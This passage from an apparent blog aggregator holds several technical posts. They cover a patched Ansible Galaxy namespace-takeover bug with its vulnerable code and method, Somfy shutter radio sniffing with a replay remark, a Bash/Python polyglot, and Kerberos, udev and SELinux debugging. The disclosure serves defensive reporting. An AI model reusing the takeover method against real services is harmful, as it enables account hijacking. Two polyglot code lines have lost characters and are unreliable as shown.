I spent some time looking for a reasonable Mini-ITX case + motherboard and then I happened upon the ASRock DeskMini X300. This turns out to be perfect; I've no need for a PCIe slot or anything more than an m.2 SSD. I paired it with a Noctua NH-L9a-AM4 heatsink + fan (same as I use in the house server), 32GB DDR4 and a 1TB WD SN550 NVMe SSD. Total cost just under £650 inc VAT + delivery (and that's a story for another post). A desktop solves the problem of fitting both machines on the desk at once, but there's still the question of smoothly switching between them. I read Evgeni Golov's article on a simple KVM switch for 30€. My monitor has multiple inputs, so that's sorted. I did have a cheap USB2 switch (all I need for the keyboard/trackball) but it turned out to be pretty unreliable at the host detecting the USB change. I bought a UGREEN USB 3.0 Sharing Switch Box instead and it's turned out to be pretty reliable. The problem is that the LG 32UM88 turns out to have a poor DDC implementation, so while I can flip the keyboard easily with the UGREEN box I also have to manually select the monitor input. Which is a bit annoying, but not terrible. The important question is whether this has helped. I built all this at the end of October, so I've had a month to play with it. Turns out I should have done it at some point last year. At the end of the day, instead of either sitting at work for a bit longer or completely avoiding the study, I'm able to lock the work machine and flick to my personal setup. Even sitting in the same seat, that "disconnect", and the knowledge I won't see work Slack messages or emails come in and feel I should respond, really helps. It also means I have access to my personal setup during the week without incurring a hit at the start of the working day when I have to set things up again. So it's much easier to just dip in to some personal tech stuff in the evening than it was previously.
Also, from the point of view that I don't need to set up the personal config, I can pick up where I left off. All of which is really nice. It's also got me thinking about other minor improvements I should make to my home working environment to try and improve things. One obvious thing, now the winter is here again, is to improve my lighting; I have a good overhead LED panel but it's terribly positioned for video calls, being just behind me. So I think I'm looking at some sort of strip light I can have behind the large monitor to give a decent degree of backlight (possibly bouncing off the white wall). Lots of cheap options I'm not convinced about, and I've had a few ridiculously priced options from photographer friends; suggestions welcome.

29 November 2021

Evgeni Golov: Getting access to somebody else's Ansible Galaxy namespace

TL;DR: adding features after the fact is hard, normalizing names is hard, it's patched, carry on. I promise, the longer version is more interesting and fun to read! Recently, I was poking around Ansible Galaxy and almost accidentally got access to someone else's namespace. I was actually looking for something completely different, but accidental finds are the best ones! If you're asking yourself: "what the heck is he talking about?!", let's slow down for a moment:
  • Ansible is a great automation engine built around the concept of modules that do things (mostly written in Python) and playbooks (mostly written in YAML) that tell which things to do
  • Ansible Galaxy is a place where people can share their playbooks and modules for others to reuse
  • Galaxy Namespaces are a way to allow users to distinguish who published what and reduce name clashes to a minimum
That means that if I ever want to share how to automate installing vim, I can publish evgeni.vim on Galaxy and other people can download that and use it. And if my evil twin wants their vim recipe published, it will end up being called evilme.vim. Thus while both recipes are called vim they can coexist, can be downloaded to the same machine, and used independently. How do you get a namespace? It's automatically created for you when you login for the first time. After that you can manage it, you can upload content, allow others to upload content and other things. You can also request additional namespaces, this is useful if you want one for an Organization or similar entities, which don't have a login for Galaxy. Apropos login, Galaxy uses GitHub for authentication, so you don't have to store yet another password, just smash that octocat! Did anyone actually click on those links above? If you did (you didn't, right?), you might have noticed another section in that document: Namespace Limitations. That says:
Namespace names in Galaxy are limited to lowercase word characters (i.e., a-z, 0-9) and _ , must have a minimum length of 2 characters, and cannot start with an _ . No other characters are allowed, including . , - , and space. The first time you log into Galaxy, the server will create a Namespace for you, if one does not already exist, by converting your username to lowercase, and replacing any - characters with _ .
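That documented conversion can be sketched in a couple of lines of Python (my reading of the quoted rules, not Galaxy's actual code; the function name is mine):

```python
def github_login_to_namespace(login):
    # lowercase the GitHub login and replace '-' with '_',
    # as the Galaxy documentation describes
    return login.lower().replace('-', '_')

print(github_login_to_namespace('evgeni'))           # evgeni
print(github_login_to_namespace('Evil-Pwnwil-666'))  # evil_pwnwil_666
```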
For my login evgeni this is pretty boring, as the generated namespace is also evgeni. But for the GitHub user Evil-Pwnwil-666 it will become evil_pwnwil_666. This can be a bit confusing. Another confusing thing is that Galaxy supports two types of content: roles and collections, but namespaces are only for collections! So it is Evil-Pwnwil-666.vim if it's a role, but evil_pwnwil_666.vim if it's a collection. I think part of this split is because collections were added much later and have a much more well thought design of both the artifact itself and its delivery mechanisms. This is by the way very important for us! Due to the fact that collections (and namespaces!) were added later, there must be code that ensures that users who were created before also get a namespace. Galaxy does this (and I would have done it the same way) by hooking into the login process, and after the user is logged in it checks if a Namespace exists and if not it creates one and sets proper permissions. And this is also exactly where the issue was! The old code looked like this:
    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)
    namespace.owners.add(user)
See how namespace.owners.add is always called? Even if the namespace already existed? Yepp! But how can we exploit that? Any user either already has a namespace (and owns it) or doesn't have one that could be owned. And given users are tied to GitHub accounts, there is no way to confuse Galaxy here. Now, remember how I said one could request additional namespaces, for organizations and stuff? Those will have owners, but the namespace name might not correspond to an existing user! So all we need is to find an existing Galaxy namespace that is not a "default" namespace (aka a specially requested one) and get a GitHub account that (after the funny name conversion) matches the namespace name. Thankfully Galaxy has an API, so I could dump all existing namespaces and their owners. Next I filtered that list to have only namespaces where the owner list doesn't contain a username that would (after conversion) match the namespace name. I found a few. And for one of them (let's call it the_target), the corresponding GitHub username (the-target) was available! Jackpot! I've registered a new GitHub account with that name, logged in to Galaxy and had access to the previously found namespace. This felt like sufficient proof that my attack worked and I mailed my findings to the Ansible Security team. The issue was fixed in d4f84d3400f887a26a9032687a06dd263029bde3 by moving the namespace.owners.add call to the "new namespace" branch. And this concludes the story of how I accidentally got access to someone else's Galaxy namespace (which was revoked after the report, no worries).
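The essence of the fix can be illustrated with plain Python standing in for the Django ORM (a sketch of the logic only, not the actual Galaxy code; namespaces are modeled as a dict of name to owner set):

```python
# 'the_target' already exists as a specially requested namespace,
# owned by a (hypothetical) organization admin
namespaces = {'the_target': {'legit_org_admin'}}

def on_login(user, sanitized_username):
    ns_name = sanitized_username.lower()
    if ns_name in namespaces:
        # the old code also added the user as owner here -- that was the bug
        pass
    else:
        # fixed code: only a *newly created* namespace gets the user as owner
        namespaces[ns_name] = {user}

on_login('the-target', 'the_target')
print(namespaces['the_target'])  # {'legit_org_admin'} -- attacker not added
```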

19 November 2021

Evgeni Golov: A String is not a String, and that's Groovy!

Halloween is over, but I still have some nightmares to share with you, so sit down, take some hot chocolate and enjoy :) When working with Jenkins, there is almost no way to avoid writing Groovy. Well, unless you only do old style jobs with shell scripts, but y'all know what I think about shell scripts. Anyways, Eric has been rewriting the jobs responsible for building Debian packages for Foreman to pipelines (and thus Groovy). Our build process for pull requests is rather simple:
  1. Setup sources - get the orig tarball and adjust changelog to have an unique version for pull requests
  2. Call pbuilder
  3. Upload the built package to a staging archive for testing
For merges, it's identical, minus the changelog adjustment. And if there are multiple packages changed in one go, it runs each step in parallel for each package. Now I've been doing mass changes to our plugin packages, to move them to a shared postinst helper instead of having the same code over and over in every package. This required changes to many packages and sometimes I'd end up building multiple at once. That should be fine, right? Well, yeah, it did build fine, but the upload only happened for the last package. This felt super weird, especially as I was absolutely sure we did test this scenario (multiple packages in one PR) and it worked just fine. So I went on a ride through the internals of the job, trying to understand why it didn't work. This requires a tad more information about the way we handle packages for Foreman:
  • the archive is handled by freight
  • it has suites like buster, focal and plugins (that one is a tad special)
  • each suite has components that match Foreman releases, so 2.5, 3.0, 3.1, nightly etc
  • core packages (Foreman etc) are built for all supported distributions (right now: buster and focal)
  • plugin packages are built only once and can be used on every distribution
As generating the package index isn't exactly fast in freight, we try to not run it too often. The idea was that when we build two packages for the same target (suite/version combination), we upload both at once and run the import only once for both. That means that when we build Foreman for buster and focal, this results in two parallel builds and then two parallel uploads (as they end up in different suites). But if we build Foreman and Foreman Installer, we have four parallel builds, but only two parallel uploads, as we can batch upload Foreman and Installer per suite. Well, or so was the theory. The Groovy code that was supposed to do this looked roughly like this:
def packages_to_build = find_changed_packages()
def repos = [:]
packages_to_build.each { pkg ->
    suite = 'buster'
    component = '3.0'
    target = "${suite}-${component}"
    if (!repos.containsKey(target)) {
        repos[target] = []
    }
    repos[target].add(pkg)
}
do_the_build(packages_to_build)
do_the_upload(repos)
That's pretty straightforward, no? We create an empty Map, loop over a list of packages and add them to an entry in the map, which we pre-create as empty if it doesn't exist. Well, no, the resulting map always ended up with only one element in each target list. And this is also why our original tests always worked: we tested with a PR containing changes to Foreman and a plugin, and plugins go to this special target we have. So I started playing with the code (https://groovyide.com/playground is really great for that!), trying to understand why the heck it erases previous data. The first finding was that it just always ended up jumping into the "if map entry not found" branch, even though the map very clearly had the correct entry after the first package was added. The second one was weird. I was trying to minimize the reproducer code (IMHO always a good idea) and switched target = "${suite}-${component}" to target = "lol". Two entries in the list, only one jump into the "map entry not found" branch. What?! So this is clearly related to the fact that we're using String interpolation here. But hey, that's a totally normal thing to do, isn't it?! Admittedly, at this point, I was lost. I knew what breaks, but not why. Luckily, I knew exactly who to ask: Jens. After a brief "well, that's interesting", Jens quickly found the source of our griefs: "Double-quoted strings are plain java.lang.String if there's no interpolated expression, but are groovy.lang.GString instances if interpolation is present." And when we do repos[target] the GString target gets converted to a String, but when we use repos.containsKey() it remains a GString. This is because GStrings get converted to Strings if the method wants one, but containsKey takes any Object, while the repos[target] notation for some reason converts it. Maybe this is because using GStrings as Map keys should be avoided. We can reproduce this with simpler code:
def map = [:]
def something = "something"
def key = "${something}"
map[key] = 1
println key.getClass()
map.keySet().each { println it.getClass() }
map.keySet().each { println it.equals(key) }
map.keySet().each { println it.equals(key as String) }
Which results in the following output:
class org.codehaus.groovy.runtime.GStringImpl
class java.lang.String
false
true
With that knowledge, the fix was to just use the same repos[target] notation also for checking for existence: Groovy helpfully returns null, which is false-y, when it can't find an entry in a Map. So yeah, a String is not always a String, and it'll bite you!
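The fixed lookup from the paragraph above would then look roughly like this (my reconstruction of the described fix, not the actual job code):

```groovy
// repos[target] converts the GString key the same way the assignment does,
// and returns null (false-y) for missing entries -- unlike containsKey()
if (!repos[target]) {
    repos[target] = []
}
repos[target].add(pkg)
```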

6 November 2021

Evgeni Golov: I just want to run this one Python script

So I couldn't sleep the other night, and my brain wanted to think about odd problems. Ever had a script that's compatible with both Python 2 and 3, but you didn't want to bother the user to know which interpreter to call? Maybe because the script is often used in environments where only one Python is available (as either /usr/bin/python OR /usr/bin/python3) and users just expect things to work? And it's only that one script file, no package, no additional wrapper script, nothing. Yes, this is a rather odd scenario. And yes, using Python doesn't make it easier, but trust me, you wouldn't want to implement the same in bash. Nothing that you will read from here on should ever be actually implemented, it will summon dragons and kill kittens. But it was a fun midnight thought, and I like to share nightmares! The nice thing about Python is it supports docstrings, essentially strings you can put inside your code which are kind of comments, but without being hidden inside comment blocks. These are often used for documentation that you can reach using Python's help() function. (Did I mention I love help()?) Bash, on the other hand, does not support docstrings. Even better, it doesn't give a damn whether you quote commands or not. You can call "ls" and you'll get your directory listing the same way as with ls. Now, nobody would under normal circumstances quote ls. Parameters to it, sure, those can contain special characters, but ls?! Another nice thing about Python: it doesn't do any weird string interpolation by default (ssssh, f-strings are cool, but not default). So "$(ls)" is exactly that, a string containing a Dollar sign, an open parenthesis, the characters "l" and "s" and a closing parenthesis. Bash, well, Bash will run ls, right? If you don't yet know where this is going, you have a clean mind, enjoy it while it lasts! So another thing that Bash has is exec: "replace[s] the shell without creating a new process".
That means that if you write exec python in your script, the process will be replaced with Python, and when the Python process ends, your script ends, as Bash isn't running anymore. Well, technically, your script ended the moment exec was called, as at that point there was no more Bash process to execute the script further. Using exec is a pretty common technique if you want to setup the environment for a program and then call it, without Bash hanging around any longer as it's not needed. So we could have a script like this:
#!/bin/bash
exec python myscript.py "$@"
Here "$@" essentially means "pass all parameters that were passed to this Bash script to the Python call" (see parameter expansion). We could also write it like this:
#!/bin/bash
"exec" "python" "myscript.py" "$@"
As far as Bash is concerned, this is the same script. But it just became valid Python, as for Python those are just docstrings. So, given this is a valid Bash script and a valid Python script now, can we make it do something useful in the Python part? Sure!
#!/bin/bash
"exec" "python" "myscript.py" "$@"
print("lol")
If we call this using Bash, it never gets further than the exec line, and when called using Python it will print lol as that's the only effective Python statement in that file. Okay, but what if this script would be called myscript.py? Exactly, calling it with Python would print lol and calling it with Bash would end up printing lol too (because it gets re-executed with Python). We can even make it name-agnostic, as Bash knows the name of the script we called:
#!/bin/bash
"exec" "python" "$0" "$@"
print("lol")
But this is still calling python, and it could be python3 on the target (or even something worse, but we're not writing a Halloween story here!). Enter another Bash command: command (SCNR!), especially "The -v option causes a single word indicating the command or file name used to invoke command to be displayed". It will also exit non-zero if the command is not found, so we can do things like $(command -v python3 || command -v python) to find a Python on the system.
#!/bin/bash
"exec" "$(command -v python3   command -v python)" "$0" "$@"
print("lol")
Not well readable, huh? Variables help!
#!/bin/bash
__PYTHON="$(command -v python3   command -v python)"
"exec" "$ __PYTHON " "$0" "$@"
print("lol")
For Python the variable assignment is just a var with a weird string, for Bash it gets executed and we store the result. Nice! Now we have a Bash header that will find a working Python and then re-execute itself using said Python, allowing us to use some proper scripting language. If you're worried that $0 won't point at the right file, just wrap it with some readlink -f.

23 July 2021

Evgeni Golov: It's not *always* DNS

Two weeks ago, I had the pleasure to play with Foreman's Kerberos integration and iron out a few long standing kinks. It all started with a user reminding us that Kerberos authentication is broken when Foreman is deployed on CentOS 8, as there is no more mod_auth_kerb available. Given mod_auth_kerb hasn't seen a release since 2013, this is quite understandable. Thankfully, there is a replacement available, mod_auth_gssapi. Even better, it's available in CentOS 7 and 8 and in Debian and Ubuntu too! So I quickly whipped up a PR to completely replace mod_auth_kerb with mod_auth_gssapi in our installer and successfully tested that it still works in CentOS 7 (even if upgrading from a mod_auth_kerb installation) and CentOS 8. Yay, the issue at hand seemed fixed. But just writing a post about that would've been boring, huh? Well, and then I dared to test the same on Debian. Turns out, our installer was using the wrong path to the Apache configuration and the wrong username Apache runs under while trying to set up Kerberos, so it could not have ever worked. Luckily Ewoud and I were able to fix that too. And yet the installer was still unable to fetch the keytab from my FreeIPA server. Let's dig deeper! To fetch the keytab, the installer does roughly this:
# kinit -k
# ipa-getkeytab -k http.keytab -p HTTP/foreman.example.com
And if one executes that by hand to see the actual error, you see:
# kinit -k
kinit: Cannot determine realm for host (principal host/foreman@)
Well, yeah, the principal looks kinda weird (no realm) and the interwebs say for "kinit: Cannot determine realm for host":
  • Kerberos cannot determine the realm name for the host. (Well, duh, that's what it said?!)
  • Make sure that there is a default realm name, or that the domain name mappings are set up in the Kerberos configuration file (krb5.conf)
And guess what, all of these are perfectly set by ipa-client-install when joining the realm But there must be something, right? Looking at the principal in the error, it's missing both the domain of the host and the realm. I was pretty sure that my DNS and config was right, but what about gethostname(2)?
# hostname
foreman
Bingo! Let's see what happens if we force that to be an FQDN?
# hostname foreman.example.com
# kinit -k
NO ERRORS! NICE! We're doing science here, right? And I still have the CentOS 8 box I had for the previous round of tests. What happens if we set that to have a shortname? Nothing. It keeps working fine. And what about CentOS 7? VMs are cheap. Well, that breaks like on Debian, if we force the hostname to be short. Interesting. Is it a version difference between the systems?
  • Debian 10 has krb5 1.17-3+deb10u1
  • CentOS 7 has krb5 1.15.1-50.el7
  • CentOS 8 has krb5 1.18.2-8.el8
So, something changed in 1.18? Looking at the krb5 1.18 changelog the following entry jumps out: "Expand single-component hostnames in host-based principal names when DNS canonicalization is not used, adding the system's first DNS search path as a suffix." Given Debian 11 has krb5 1.18.3-5 (well, testing has, so let's pretend bullseye will too), we can retry the experiment there, and it shows that it works with both short and full hostnames. So yeah, it seems krb5 "does the right thing" since 1.18, and before that gethostname(2) must return an FQDN. I've documented that for our users and can now sleep a bit better. At least it wasn't DNS, right?! Btw, freeipa won't be in bullseye, which makes me a bit sad, as that means that Foreman won't be able to automatically join FreeIPA realms if deployed on Debian 11.
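If you want to quickly check what your own box reports, Python's socket module wraps gethostname(2) directly:

```python
import socket

# gethostname(2) result vs. the resolved FQDN: on a "short hostname" box
# these differ, which is what broke kinit with krb5 < 1.18 as described above
print(socket.gethostname())
print(socket.getfqdn())
```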

6 June 2021

Evgeni Golov: Controlling Somfy roller shutters using an ESP32 and ESPHome

Our house has solar powered, remote controllable roller shutters on the roof windows, built by the German company named HEIM & HAUS. However, when you look closely at the remote control or the shutter motor, you'll see another brand name: SIMU. As the shutters don't have any wiring inside the house, the only way to control them is via the remote interface. So let's go on the Internet and see how one can do that, shall we? ;) First thing we learn is that SIMU remote stuff is just re-branded Somfy. Great, another name! Looking further we find that Somfy uses some obscure protocol to prevent (replay) attacks (spoiler: it doesn't!) and there are tools for RTL-SDR and Arduino available. That's perfect! Always sniff with RTL-SDR first! Given the two re-brandings in the supply chain, I wasn't 100% sure our shutters really use the same protocol. So the first "hack" was to listen and decrypt the communication using RTL-SDR:
$ git clone https://github.com/dimhoff/radio_stuff
$ cd radio_stuff
$ make -C converters am_to_ook
$ make -C decoders decode_somfy
$ rtl_fm -M am -f 433.42M -s 270K | ./am_to_ook -d 10 -t 2000 - | ./decode_somfy
<press some buttons on the remote>
The output contains the buttons I pressed, but also the id of the remote and the command counter (which is supposed to prevent replay attacks). At this point I could just use the id and the counter to send own commands, but if I'd do that too often, the real remote would stop working, as its counter won't increase and the receiver will drop the commands when the counters differ too much. But that's good enough for now. I know I'm looking for the right protocol at the right frequency. As the end result should be an ESP32, let's move on! Acquiring the right hardware Contrary to an RTL-SDR, one usually does not have a spare ESP32 with 433MHz radio at home, so I went shopping: a NodeMCU-32S clone and a CC1101. The CC1101 is important as most 433MHz chips for Arduino/ESP only work at 433.92MHz, but Somfy uses 433.42MHz and using the wrong frequency would result in really bad reception. The CC1101 is essentially an SDR, as you can tune it to a huge spectrum of frequencies. Oh and we need some cables, a bread board, the usual stuff ;) The wiring is rather simple: ESP32 wiring for a CC1101 And the end result isn't too beautiful either, but it works: ESP32 and CC1101 in a simple case Acquiring the right software In my initial research I found an Arduino sketch and was totally prepared to port it to ESP32, but luckily somebody already did that for me! Even better, it's explicitly using the CC1101. Okay, okay, I cheated, I actually ordered the hardware after I found this port and the reference to CC1101. ;) As I am using ESPHome for my ESPs, the idea was to add a "Cover" that's controlling the shutters to it. Writing some C++, how hard can it be? Turns out, not that hard. You can see the code in my GitHub repo. It consists of two (relevant) files: somfy_cover.h and somfy.yaml. somfy_cover.h essentially wraps the communication with the Somfy_Remote_Lib library into an almost boilerplate Custom Cover for ESPHome. There is nothing too fancy in there. 
The only real difference to the "Custom Cover" example from the documentation is the split into SomfyESPRemote (which inherits from Component) and SomfyESPCover (which inherits from Cover) -- this is taken from the Custom Sensor documentation and allows me to define one "remote" that controls multiple "covers" using the add_cover function. The first two params of the function are the NVS name and key (think database table and row), and the third is the rolling code of the remote (stored in somfy_secrets.h, which is not in Git). In ESPHome a Cover shall define its properties as CoverTraits. Here we call set_is_assumed_state(true), as we don't know the state of the shutters - they could have been controlled using the other (real) remote - and setting this to true allows issuing open/close commands at all times. We also call set_supports_position(false) as we can't tell the shutters to move to a specific position. The one additional feature compared to a normal Cover interface is the program function, which allows to call the "program" command so that the shutters can learn a new remote. somfy.yaml is the ESPHome "configuration", which contains information about the used hardware, WiFi credentials etc. Again, mostly boilerplate. The interesting parts are the loading of the additional libraries and attaching the custom component with multiple covers and the additional PROG switches:
esphome:
  name: somfy
  platform: ESP32
  board: nodemcu-32s
  libraries:
    - SmartRC-CC1101-Driver-Lib@2.5.6
    - Somfy_Remote_Lib@0.4.0
    - EEPROM
  includes:
    - somfy_secrets.h
    - somfy_cover.h
 
cover:
  - platform: custom
    lambda: |-
      auto somfy_remote = new SomfyESPRemote();
      somfy_remote->add_cover("somfy", "badezimmer", SOMFY_REMOTE_BADEZIMMER);
      somfy_remote->add_cover("somfy", "kinderzimmer", SOMFY_REMOTE_KINDERZIMMER);
      App.register_component(somfy_remote);
      return somfy_remote->covers;
    covers:
      - id: "somfy"
        name: "Somfy Cover"
      - id: "somfy2"
        name: "Somfy Cover2"
switch:
  - platform: template
    name: "PROG"
    turn_on_action:
      - lambda: |-
          ((SomfyESPCover*)id(somfy))->program();
  - platform: template
    name: "PROG2"
    turn_on_action:
      - lambda: |-
          ((SomfyESPCover*)id(somfy2))->program();
The switch to trigger the program mode took me a bit. As the Cover interface of ESPHome does not offer any additional functions besides movement control, I first wrote code to trigger "program" when "stop" was pressed three times in a row, but that felt really cumbersome and also had the side effect that the remote would send more than needed, sometimes confusing the shutters. I then decided to have a separate button (well, switch) for that, but the compiler yelled at me that I can't call program on a Cover as it does not have such a function. Turns out, you need to explicitly cast to SomfyESPCover and then it works, even if the code becomes really readable, NOT. Oh and as the switch does not have any code to actually change/report state, it effectively acts as a button that can be pressed. At this point we can just take an existing remote, press PROG for 5 seconds, see the blinds move shortly up and down a bit, press PROG on our new ESP32 remote, and the shutters will learn the new remote. And thanks to the awesome integration of ESPHome into HomeAssistant, this instantly shows up as a new controllable cover there too. Future Additional Work: I started writing this post about a year ago, and the initial implementation had some room for improvement. More than one remote: The initial code only created one remote and one cover element. Sure, we could attach that to all shutters (there are 4 of them), but we really want to be able to control them separately. Thankfully I managed to read enough ESPHome docs, and learned how to operate std::vector to make the code dynamically accept new shutters. Using ESP32's NVS: The ESP32 has a non-volatile key-value storage which is much nicer than throwing bits at an emulated EEPROM. The first library I used for that explicitly used EEPROM storage and it would have required quite some hacking to make it work with NVS.
Thankfully the library I am using now has a pluggable storage interface, and I could just write the NVS backend myself; upstream now supports that. Yay open source!

Remaining issues

Real state is unknown

As noted above, the ESP does not know the real state of the shutters: a command could have been lost in transmission (the Somfy protocol is send-only, there is no feedback) or the shutters might have been controlled by another remote. At least the second part could be solved by listening all the time and trying to decode commands heard over the air, but I don't think this is worth the time -- the worst that can happen is that a closed (opened) shutter receives another close (open) command, and that is harmless as they have integrated endstops and know that they should not move further.

Can't program new remotes with ESP only

To program new remotes, one has to press the "PROG" button for 5 seconds. This was not exposed in the old library, but the new one does support "long press". I would just need to add another ugly switch to the config, and I currently don't plan to do so, as I do have working remotes for the case I need to learn a new one.

18 January 2021

Evgeni Golov: building a simple KVM switch for 30 €

Prompted by tweets from Lesley and Dave, I thought about KVM switches again and came up with a rather cheap solution to my individual situation (YMMV, as usual). As I've written last year, my desk has one monitor, keyboard and mouse and two computers. Since writing that post I got a new (bigger) monitor, but also a USB switch again (a DIGITUS USB 3.0 Sharing Switch) - this time one that doesn't freak out my dock \o/ However, having to switch the used computer in two places (USB and monitor) is rather inconvenient, and getting a KVM switch that can do 4K@60Hz was out of the question. Luckily, hackers gonna hack everything, and not only receipt printers. There is a tool called ddcutil that can talk to your monitor and change various settings. And udev can execute commands when (USB) devices connect. You see where this is going? After installing the package (available both in Debian and Fedora), we can inspect our system with ddcutil detect. You might have to load the i2c_dev module (thanks Philip!) before this works -- it seems to be loaded automatically on my Fedora, but you never know.
$ sudo ddcutil detect
Invalid display
   I2C bus:             /dev/i2c-4
   EDID synopsis:
      Mfg id:           BOE
      Model:
      Serial number:
      Manufacture year: 2017
      EDID version:     1.4
   DDC communication failed
   This is an eDP laptop display. Laptop displays do not support DDC/CI.
Invalid display
   I2C bus:             /dev/i2c-5
   EDID synopsis:
      Mfg id:           AOC
      Model:            U2790B
      Serial number:
      Manufacture year: 2020
      EDID version:     1.4
   DDC communication failed
Display 1
   I2C bus:             /dev/i2c-7
   EDID synopsis:
      Mfg id:           AOC
      Model:            U2790B
      Serial number:
      Manufacture year: 2020
      EDID version:     1.4
   VCP version:         2.2
The first detected display is the built-in one in my laptop, and those don't support DDC anyways. The second one is a ghost (see ddcutil#160) which we can ignore. But the third one is the one we can (and will) control. As this is the only valid display ddcutil found, we don't need to specify which display to talk to in the following commands. Otherwise we'd have to add something like --display 1 to them. A ddcutil capabilities will show us what the monitor is capable of (or what it thinks, I've heard some give rather buggy output here) -- we're mostly interested in the "Input Source" feature (Virtual Control Panel (VCP) code 0x60):
$ sudo ddcutil capabilities
 
   Feature: 60 (Input Source)
      Values:
         0f: DisplayPort-1
         11: HDMI-1
         12: HDMI-2
 
Seems mine supports it, and I should be able to switch the inputs by jumping between 0x0f, 0x11 and 0x12. You can see other values defined by the spec in ddcutil vcpinfo 60 --verbose; some monitors are using wrong values for their inputs. Let's see if ddcutil getvcp agrees that I'm using DisplayPort now:
$ sudo ddcutil getvcp 0x60
VCP code 0x60 (Input Source                  ): DisplayPort-1 (sl=0x0f)
And try switching to HDMI-1 using ddcutil setvcp:
$ sudo ddcutil setvcp 0x60 0x11
Cool, cool. So now we just need a way to trigger input source switching based on some event. There are three devices connected to my USB switch: my keyboard, my mouse and my Yubikey. I do use the mouse and the Yubikey while the laptop is not docked too, so these are not good indicators that the switch has been turned to the laptop. But the keyboard is! Let's see what vendor and product IDs it has, so we can write a udev rule for it:
$ lsusb
 
Bus 005 Device 006: ID 17ef:6047 Lenovo ThinkPad Compact Keyboard with TrackPoint
 
Okay, so let's call ddcutil setvcp 0x60 0x0f when the USB device 0x17ef:0x6047 is added to the system:
ACTION=="add", SUBSYSTEM=="usb", ATTR{idVendor}=="17ef", ATTR{idProduct}=="6047", RUN+="/usr/bin/ddcutil setvcp 0x60 0x0f"
$ sudo vim /etc/udev/rules.d/99-ddcutil.rules
$ sudo udevadm control --reload
And done! Whenever I connect my keyboard now, it will force my screen to use DisplayPort-1. On my workstation, I deployed the same rule, but with ddcutil setvcp 0x60 0x11 to switch to HDMI-1, and my cheap not-really-KVM-but-in-the-end-KVM-USB-switch is done, for the price of one USB switch (~30 €). Note: if you want to use ddcutil with a Lenovo Thunderbolt 3 Dock (or any other dock using DisplayPort Multi-Stream Transport (MST)), you'll need kernel 5.10 or newer, which fixes a bug that prevented ddcutil from talking to the monitor using I²C.
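If you want more logic than a plain RUN+= in the udev rule (say, different inputs per machine), the same idea can be wrapped in a small script. This is a hypothetical helper, not part of ddcutil; the VCP values are the ones my monitor reported and will differ for other models:

```python
import subprocess

# Input-source values for VCP feature 0x60 as reported by *my* monitor's
# capabilities -- run `ddcutil capabilities` to find yours.
INPUTS = {
    'displayport-1': 0x0f,
    'hdmi-1': 0x11,
    'hdmi-2': 0x12,
}

def setvcp_command(source):
    """Build the ddcutil command line to switch to the given input source."""
    return ['ddcutil', 'setvcp', '0x60', '0x{:02x}'.format(INPUTS[source])]

def switch_input(source):
    """Run ddcutil (needs appropriate permissions, e.g. root via a udev RUN)."""
    subprocess.run(setvcp_command(source), check=True)
```

The udev rule would then just call this script with the desired input name instead of hardcoding the setvcp arguments.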

11 December 2020

Evgeni Golov: systemd + SELinux =

Okay, getting a title that will ensure clicks for this post was easy. Now comes the hard part: content! When you deploy The Foreman, you want a secure setup by default. That's why we ship (and enable) a SELinux policy which allows you to run the involved daemons in confined mode. We have recently switched our default Ruby application server from Passenger (running via mod_passenger inside Apache httpd) to Puma (running standalone and Apache just being a reverse proxy). While doing so, we initially deployed Puma listening on localhost:3000, and while localhost is pretty safe, a local user could still turn out evil and talk directly to Puma, pretending to be authenticated by Apache (think Kerberos or X.509 cert auth). Obviously, this is not optimal, so the next task was to switch Puma to listen on a UNIX socket and only allow Apache to talk to said socket. This doesn't sound overly complicated, and indeed it wasn't. The most time/thought was spent on doing that in a way that doesn't break existing setups and still allows binding to a TCP socket for setups where users explicitly want that. We also made a change to the SELinux policy to properly label the newly created socket and allow httpd to access it. The whole change was carefully tested on CentOS 7 and worked like a charm. So we merged it, and it broke. Only on CentOS 8, but broken is broken, right? This is the start of my Thanksgiving story "learn how to debug SELinux issues" ;) From the logs of our integration test I knew the issue was Apache not being able to talk to that new socket (we archive sos reports as part of the tests, and those clearly had it in the auditd logs). But I also knew we did prepare our policy for that change, so either our preparation was not sufficient or the policy wasn't properly loaded. The same sos report also contained the output of semanage fcontext --list which stated that all regular files called /run/foreman.sock would get the foreman_var_run_t type assigned.
Wait a moment, all regular files?! A socket is not a regular file! Let's quickly make that truly all files. That clearly changed the semanage fcontext --list output, but the socket was still created as var_run_t?! It was time to actually boot a CentOS 8 VM and try more things out. Interestingly, you actually can't add a rule for /run/something, as /run is an alias (equivalency in SELinux speak) for /var/run:
# semanage fcontext --add -t foreman_var_run_t /run/foreman.sock
ValueError: File spec /run/foreman.sock conflicts with equivalency rule '/run /var/run'; Try adding '/var/run/foreman.sock' instead
I have no idea how the list output in the report got that /run rule, but okay, let's match /var/run/foreman.sock. Did that solve the issue? Of course not! And you knew it, as I didn't get to the juiciest part of the headline yet: systemd! We use systemd to create the socket, as it is both convenient and useful (no more clients connecting before Rails has finished booting). But why is it wrongly labeling our freshly created socket?! A quick check with touch shows that the policy is correct now, the touched file gets the right type assigned. So it must be something with systemd. A bit of poking (and good guesswork based on prior experience with a similar issue in Puppet: PUP-2169 and PUP-10548) led to the realization that a systemctl daemon-reexec after adding the file context rule "fixes" the issue. Moving the poking to Google, you quickly end up at systemd issue #9997, which is fixed in v245, but that's in no EL release yet. And indeed, the issue seems fixed on my Fedora 33 with systemd 246, but I still need it to work on CentOS 7 and 8. Well, maybe that reexec isn't that bad after all? At least the socket is now properly labeled and httpd can connect to it on CentOS 8. Btw, no idea why the connection worked on CentOS 7, as there the socket was also wrongly labeled, but SELinux didn't deny httpd opening it. Big shout out to lzap and ewoud for helping me with this beast!
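For readers who haven't used socket activation before: a setup like the one described boils down to a systemd socket unit roughly along these lines. This is a minimal sketch for illustration, not the actual unit the Foreman installer ships, and the user/group names are assumptions:

```
# foreman.socket -- minimal sketch, NOT the actual shipped unit;
# SocketUser/SocketGroup values are assumptions for illustration
[Unit]
Description=Foreman HTTP server socket

[Socket]
ListenStream=/run/foreman.sock
SocketUser=foreman
SocketGroup=apache
SocketMode=0660

[Install]
WantedBy=sockets.target
```

With such a unit, systemd creates /run/foreman.sock before Puma starts, which is exactly why systemd's labeling behavior (and the daemon-reexec quirk) matters here.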

24 July 2020

Evgeni Golov: Building documentation for Ansible Collections using antsibull

